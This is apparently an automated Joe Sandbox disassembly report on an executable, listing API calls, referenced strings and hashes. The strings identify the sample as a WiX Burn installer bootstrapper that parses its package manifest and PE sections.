Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: 8f5373095643d43effb911d88bcd9851189d35d57ed3b82cdb206be0304d060f
Instruction ID: 17707ea55925f26f613d6657553cd020e0df2b95fc38f8160396aca2b64f8baf
Opcode Fuzzy Hash: 8f5373095643d43effb911d88bcd9851189d35d57ed3b82cdb206be0304d060f
Instruction Fuzzy Hash: FBF0C873A85535A79B225A9E5C45A57EB5CEB85B707538121BD04BB110DA60DD0042E0

Function 009BE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 009BEBD2

Part of subcall function 009C1380: RaiseException.KERNEL32(?,?,?,009BEBF4,?,00000000,00000000,?,?,?,?,?,009BEBF4,?,009F7EC8), ref: 009C13DF

__CxxThrowException@8.LIBVCRUNTIME ref: 009BEBEF

Strings

Unknown exception, xrefs: 009BEBFC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: a6d6c7ed1645893d738a6bc5cdf6e12618330ff03e4948420d3a76fe1345bd66
Instruction ID: 18b577f89ffa7fea768d551841ec5e620d0dc3b1ff0a543fc9d1f530d31ee8a1
Opcode Fuzzy Hash: a6d6c7ed1645893d738a6bc5cdf6e12618330ff03e4948420d3a76fe1345bd66
Instruction Fuzzy Hash: C7F0C234D0020DBBDB10BAA5DE5AFED77AC9E80364B50456AF925924D2EB30EE15C6C2

Function 009D4A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,755734C0,?,?,?,0099BA1D,?,?,?,00000000,00000000), ref: 009D4A1D
GetLastError.KERNEL32(?,?,?,0099BA1D,?,?,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 009D4A27

Strings

fileutil.cpp, xrefs: 009D4A4B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: a341ae134fb0e2dc6634068d9fe0a5f3e9cd32668a945c68fc3cb433c08c0625
Instruction ID: 2d4217be370d067ebb188c2c822288328b109d653ec5b660b5110753f11736ad
Opcode Fuzzy Hash: a341ae134fb0e2dc6634068d9fe0a5f3e9cd32668a945c68fc3cb433c08c0625
Instruction Fuzzy Hash: 64F0C87399523AAB97108F89C90595AFBACFF54B60F018117FD54A7300E770AD00C7D4

Function 009D3D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00995466,?,00000000,00995466,?,?,?), ref: 009D3DA7
CoCreateInstance.OLE32(00000000,00000000,00000001,009F716C,?), ref: 009D3DBF

Strings

Microsoft.Update.AutoUpdate, xrefs: 009D3DA2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate
API String ID: 2151042543-675569418
Opcode ID: e76602608a1b4be04a75ad6be3edc866f7112de98f35f67d523281bbda29d083
Instruction ID: bec7457d47c4da2606a571704c45b3170d47156d55deee4693625a30321e1db7
Opcode Fuzzy Hash: e76602608a1b4be04a75ad6be3edc866f7112de98f35f67d523281bbda29d083
Instruction Fuzzy Hash: 71F03A7165520CBBDB00EFA8DD05AFFF7BDDB49B10F41406AEA01E7190DA71AA0497A2

Function 009D0E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 009D0E28

Strings

RegDeleteKeyExW, xrefs: 009D0E1D
AdvApi32.dll, xrefs: 009D0E0D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: f6606c474e6d94eca87d63746aeb73a2d2a1e48b90fcfd8e3087ae40f1be5ddf
Instruction ID: 5665ef34c2ff18e0441eba2185f06ba5541a5df1403a4a79370fa1d4ca223191
Opcode Fuzzy Hash: f6606c474e6d94eca87d63746aeb73a2d2a1e48b90fcfd8e3087ae40f1be5ddf
Instruction Fuzzy Hash: 8DE0127155A3299BCB115F15FC09B627F91A79077CF018125E508DB370D3B28840EF90

Analysis Process: 24EPV9vjc5.exePID: 7388, Parent PID: 7320COMMON

Executed Functions

Function 00B71070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B733C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00B710DD,?,00000000), ref: 00B733E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00B710F6

Part of subcall function 00B71175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00B7111A,cabinet.dll,00000009,?,?,00000000), ref: 00B71186
Part of subcall function 00B71175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00B7111A,cabinet.dll,00000009,?,?,00000000), ref: 00B71191
Part of subcall function 00B71175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B7119F
Part of subcall function 00B71175: GetLastError.KERNEL32(?,?,?,?,?,00B7111A,cabinet.dll,00000009,?,?,00000000), ref: 00B711BA
Part of subcall function 00B71175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B711C2
Part of subcall function 00B71175: GetLastError.KERNEL32(?,?,?,?,?,00B7111A,cabinet.dll,00000009,?,?,00000000), ref: 00B711D7

CloseHandle.KERNEL32(?,?,?,?,00BBB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00B71131

Strings

wininet.dll, xrefs: 00B710AE
msasn1.dll, xrefs: 00B710C3
feclient.dll, xrefs: 00B710D1
comres.dll, xrefs: 00B710B5
cabinet.dll, xrefs: 00B71099, 00B71114
crypt32.dll, xrefs: 00B710CA
clbcatq.dll, xrefs: 00B710BC
version.dll, xrefs: 00B710A7
msi.dll, xrefs: 00B710A0

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 2caf13ad185b27974c6e6cf5bb13abc6c35f3c7afbffffed47848b4705bf91b4
Instruction ID: 012ffce9fc5c0b1a4c44642cadfc7290db9202897ab61c2730ad06d199ff223c
Opcode Fuzzy Hash: 2caf13ad185b27974c6e6cf5bb13abc6c35f3c7afbffffed47848b4705bf91b4
Instruction Fuzzy Hash: 57211E7290021CABDB109FA9DC45FEEBBF8FB05710F908595EA25BB281D7F059048BB4

Function 00BAFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00BDB5FC,00000000,?,?,?,?,00B912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00BAFEF4
GetCurrentProcessId.KERNEL32(00000000,?,00B912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00BAFF04
GetCurrentThreadId.KERNEL32 ref: 00BAFF0D
GetLocalTime.KERNEL32(8007139F,?,00B912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00BAFF23
LeaveCriticalSection.KERNEL32(00BDB5FC,00B912CF,?,00000000,0000FDE9,?,00B912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00BB001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00BAFFC0

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 053483227aebe94de0e908685eec2a1abff17cf1e215df34d3de7c346b6fe721
Instruction ID: 70c6bf49ad5a422bfa43f8c4f4a5179b9c73923820c5003ee07aa3442a8615df
Opcode Fuzzy Hash: 053483227aebe94de0e908685eec2a1abff17cf1e215df34d3de7c346b6fe721
Instruction Fuzzy Hash: 7B417F3290211AAFCF219BA4D854AFFB7F4EB19711F0041A6F901A7250EB758D41CBA1

Function 00B8A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to calculate working folder to ensure it exists., xrefs: 00B8A0D8
Failed to copy working folder., xrefs: 00B8A116
Failed create working folder., xrefs: 00B8A0EE

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 5aa7897bf482657cfb59af2dade32cfe04d3be01a5caf6ddc21ebbae7b1778ee
Instruction ID: fb8874afb9ecdc15de14e542ac404f48415f659d18d9abb67a947d247bfc6f2b
Opcode Fuzzy Hash: 5aa7897bf482657cfb59af2dade32cfe04d3be01a5caf6ddc21ebbae7b1778ee
Instruction Fuzzy Hash: 07017532901525FB5F227B55DD1ADAEBBF9DF55710B1082D6F8007A230DB719E00E791

Function 00B7DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00B7E058
SysFreeString.OLEAUT32(00000000), ref: 00B7E736

Part of subcall function 00B7394F: GetProcessHeap.KERNEL32(?,000001C7,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73960
Part of subcall function 00B7394F: RtlAllocateHeap.NTDLL(00000000,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73967

Strings

comres.dll, xrefs: 00B7E234
Failed to find forward transaction boundary: %ls, xrefs: 00B7E506
ExePackage, xrefs: 00B7E357
Failed to allocate memory for package structs., xrefs: 00B7E0EF
Failed to get @CacheId., xrefs: 00B7E6DB
Failed to get @InstallCondition., xrefs: 00B7E4F9
Failed to get @Cache., xrefs: 00B7E6FA
LogPathVariable, xrefs: 00B7E276
Failed to get @RollbackBoundaryForward., xrefs: 00B7E510
Failed to get @Id., xrefs: 00B7E701
Failed to parse target product codes., xrefs: 00B7E69B
Invalid cache type: %ls, xrefs: 00B7E6EA
crypt32.dll, xrefs: 00B7E2BB
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 00B7E081
Failed to select package nodes., xrefs: 00B7E094
msi.dll, xrefs: 00B7E1C8
Failed to get @Vital., xrefs: 00B7E6B8
package.cpp, xrefs: 00B7DFBE, 00B7E0E3, 00B7E4CF, 00B7E564
Failed to get @RollbackLogPathVariable., xrefs: 00B7E4EF
Failed to find backward transaction boundary: %ls, xrefs: 00B7E51D
`5w, xrefs: 00B7E058, 00B7E47B, 00B7E736
Failed to get rollback bundary node count., xrefs: 00B7DF8E
Failed to get @LogPathVariable., xrefs: 00B7E4E5
Failed to parse MSP package., xrefs: 00B7E531
Failed to allocate memory for MSP patch sequence information., xrefs: 00B7E4DB
Failed to parse MSI package., xrefs: 00B7E3C1
RollbackLogPathVariable, xrefs: 00B7E299
MspPackage, xrefs: 00B7E3CD
Failed to parse EXE package., xrefs: 00B7E389
Failed to get package node count., xrefs: 00B7E0B1
PerMachine, xrefs: 00B7E21A
clbcatq.dll, xrefs: 00B7E219
RollbackBoundaryBackward, xrefs: 00B7E319
Size, xrefs: 00B7E1E4
MsuPackage, xrefs: 00B7E406
Permanent, xrefs: 00B7E235
RollbackBoundary, xrefs: 00B7DF56
cabinet.dll, xrefs: 00B7E1FE
Failed to allocate memory for rollback boundary structs., xrefs: 00B7DFCA
Failed to get @InstallSize., xrefs: 00B7E6CD
Failed to allocate memory for patch sequence information to package lookup., xrefs: 00B7E570
InstallSize, xrefs: 00B7E1FF
MsiPackage, xrefs: 00B7E395
wininet.dll, xrefs: 00B7E25A
feclient.dll, xrefs: 00B7E298
Failed to get @Permanent., xrefs: 00B7E6BF
Vital, xrefs: 00B7E027, 00B7E25B
Failed to get @Size., xrefs: 00B7E6D4
yes, xrefs: 00B7E187
InstallCondition, xrefs: 00B7E2BC
Failed to parse payload references., xrefs: 00B7E6B1
CacheId, xrefs: 00B7E1C9
Failed to get @RollbackBoundaryBackward., xrefs: 00B7E527
Failed to parse MSU package., xrefs: 00B7E53B
Cache, xrefs: 00B7E14B
RollbackBoundaryForward, xrefs: 00B7E2DF
always, xrefs: 00B7E1A7
Failed to get @PerMachine., xrefs: 00B7E6C6
Failed to get next node., xrefs: 00B7E708
Failed to select rollback boundary nodes., xrefs: 00B7DF69
Failed to parse dependency providers., xrefs: 00B7E6AA

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`5w$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-885345141
Opcode ID: 329f9f75753f7e57b95a0150971715aa5e9dd73ab84708b6f72d8a2c4d106c76
Instruction ID: a8ee9926b9476ae78d35cfef1396ba9fd876bba39efc2eca6c46351702b8c036
Opcode Fuzzy Hash: 329f9f75753f7e57b95a0150971715aa5e9dd73ab84708b6f72d8a2c4d106c76
Instruction Fuzzy Hash: 7F32A471D54215EBCB11AB54CC41FAEB6F4AF18720F1182E9F939BB2A0D7B0ED009B94

Function 00B7F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tag, xrefs: 00B7FA57
Register, xrefs: 00B7FB5D
Failed to get @Classification., xrefs: 00B7FEF5
Failed to get @Version., xrefs: 00B7FAA4
Failed to get @ProviderKey., xrefs: 00B7FAE6
Failed to get @Publisher., xrefs: 00B7FBDF
UpdateUrl, xrefs: 00B7FC5C
DisplayName, xrefs: 00B7FB7E
ProviderKey, xrefs: 00B7FAD3
Publisher, xrefs: 00B7FBC8
Classification, xrefs: 00B7FEE2
Failed to get @ExecutableName., xrefs: 00B7FB07
Failed to get @Id., xrefs: 00B7FA49
Manufacturer, xrefs: 00B7FE53
DisableRemove, xrefs: 00B7FDC9
Comments, xrefs: 00B7FCA9
HelpLink, xrefs: 00B7FBED
Failed to get @Department., xrefs: 00B7FE8E
Failed to get @ProductFamily., xrefs: 00B7FEB3
Failed to get @UpdateUrl., xrefs: 00B7FC73
Failed to get @DisplayName., xrefs: 00B7FB95
Invalid modify disabled type: %ls, xrefs: 00B7FD94
Failed to get @Comments., xrefs: 00B7FCC0
ProductFamily, xrefs: 00B7FE9C
ParentDisplayName, xrefs: 00B7FC81
Version, xrefs: 00B7FA91
Update, xrefs: 00B7FE1E
DisplayVersion, xrefs: 00B7FBA3
Failed to get @Contact., xrefs: 00B7FCE8
Failed to get @AboutUrl., xrefs: 00B7FC4E
Department, xrefs: 00B7FE77
Failed to get @Name., xrefs: 00B7FED4
PerMachine, xrefs: 00B7FB12
Contact, xrefs: 00B7FCD1
Failed to select Update node., xrefs: 00B7FE3C
Failed to parse software tag., xrefs: 00B7FE10
Failed to parse related bundles, xrefs: 00B7FA83
Failed to get @ParentDisplayName., xrefs: 00B7FC98
Failed to get @DisableModify., xrefs: 00B7FDB8
Failed to parse @Version: %ls, xrefs: 00B7FAC5
Failed to get @Tag., xrefs: 00B7FA6A
HelpTelephone, xrefs: 00B7FC12
Failed to get @DisableRemove., xrefs: 00B7FDE0
Failed to select ARP node., xrefs: 00B7FB4F
Failed to get @Manufacturer., xrefs: 00B7FE66
button, xrefs: 00B7FD15
DisableModify, xrefs: 00B7FCF6
AboutUrl, xrefs: 00B7FC37
Failed to set registration paths., xrefs: 00B7FF08
Failed to get @HelpLink., xrefs: 00B7FC04
yes, xrefs: 00B7FD36
Registration, xrefs: 00B7F9FD
Failed to select registration node., xrefs: 00B7FA1C
Failed to get @Register., xrefs: 00B7FB70
Arp, xrefs: 00B7FB33
Failed to get @HelpTelephone., xrefs: 00B7FC29
registration.cpp, xrefs: 00B7FD87
Name, xrefs: 00B7FEC1
Failed to get @DisplayVersion., xrefs: 00B7FBBA
ExecutableName, xrefs: 00B7FAF4
Failed to get @PerMachine., xrefs: 00B7FB25

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: d990c5011334bfd96001e315cd2cb52d7d744d073a7f592436e5b9c8f613cefb
Instruction ID: e476e70b9a95cacdb8ad6a00efbdaa9b58a1a389d5f13b7b36e4e40d8be125c8
Opcode Fuzzy Hash: d990c5011334bfd96001e315cd2cb52d7d744d073a7f592436e5b9c8f613cefb
Instruction Fuzzy Hash: F9E1B832E45667BBCB21A664CC42FFDB6E4AB01B10F1186F6F939F7261CB619D0096C4

Function 00B7B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00B7B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B550
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00B7B556
ReadFile.KERNELBASE(00000000,00B74461,00000040,?,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B59E
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00B7B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B7BD

Part of subcall function 00B7394F: GetProcessHeap.KERNEL32(?,000001C7,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73960
Part of subcall function 00B7394F: RtlAllocateHeap.NTDLL(00000000,?,00B72274,000001C7,00000001,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00B7B906

Strings

Failed to read signature size., xrefs: 00B7B796
Failed to read section info, data to short: %u, xrefs: 00B7B8AA
burn, xrefs: 00B7B838
Failed to read image section header, index: %u, xrefs: 00B7BBAC
Failed to find Burn section., xrefs: 00B7BB32
Failed to find valid NT image header in buffer., xrefs: 00B7BBD0
Failed to read NT header., xrefs: 00B7B681
.wix, xrefs: 00B7B830
Failed to read section info., xrefs: 00B7B999
4, xrefs: 00B7B884
Failed to seek to start of file., xrefs: 00B7B581
Failed to read complete section info., xrefs: 00B7B9C5
section.cpp, xrefs: 00B7B523, 00B7B577, 00B7B5C5, 00B7B628, 00B7B677, 00B7B6EE, 00B7B73D, 00B7B78C, 00B7B7E1, 00B7B898, 00B7B8D8, 00B7B92A, 00B7B98F, 00B7B9B9, 00B7B9E0, 00B7BAC7, 00B7BB07, 00B7BB26, 00B7BB63, 00B7BBA1, 00B7BBC4, 00B7BBDF
Failed to read signature offset., xrefs: 00B7B747
Failed to read DOS header., xrefs: 00B7B5CF
PE Header from file didn't match PE Header in memory., xrefs: 00B7BB11
Failed to seek to NT header., xrefs: 00B7B632
Failed to seek to section info., xrefs: 00B7B6F8, 00B7B934
Failed to get total size of bundle., xrefs: 00B7BA23
PE, xrefs: 00B7B698
